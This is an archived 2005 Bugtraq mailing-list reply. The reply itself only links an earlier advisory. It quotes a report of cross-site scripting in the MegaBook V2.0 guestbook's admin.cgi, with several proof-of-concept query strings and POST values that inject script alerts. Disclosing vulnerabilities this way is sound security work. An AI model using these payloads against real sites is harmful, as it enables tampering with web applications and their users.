lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 6 May 2005 07:18:31 -0000
From: Morning Wood <wood@...loitlabs.com>
To: bugtraq@...urityfocus.com
Subject: Re: MegaBook V2.0 - Cross Site Scripting Exploit


In-Reply-To: <20050505104551.23441.qmail@....securityfocus.com>

umm..
http://exploitlabs.com/files/advisories/EXPL-A-2003-011-megabook-2.0.txt

>Subject: MegaBook V2.0 - Cross Site Scripting Exploit
>
>
>
>The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi 
>
>URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 
>
>I have tested the script with the following query:
>
>?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;
>
>I have also tested the script with theses POST variables:
>
>action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;
>
>action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;
>
>action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;
>
>action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;
>
>action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;
>
>
>Yours,
>SpyHat
>


Powered by blists - more mailing lists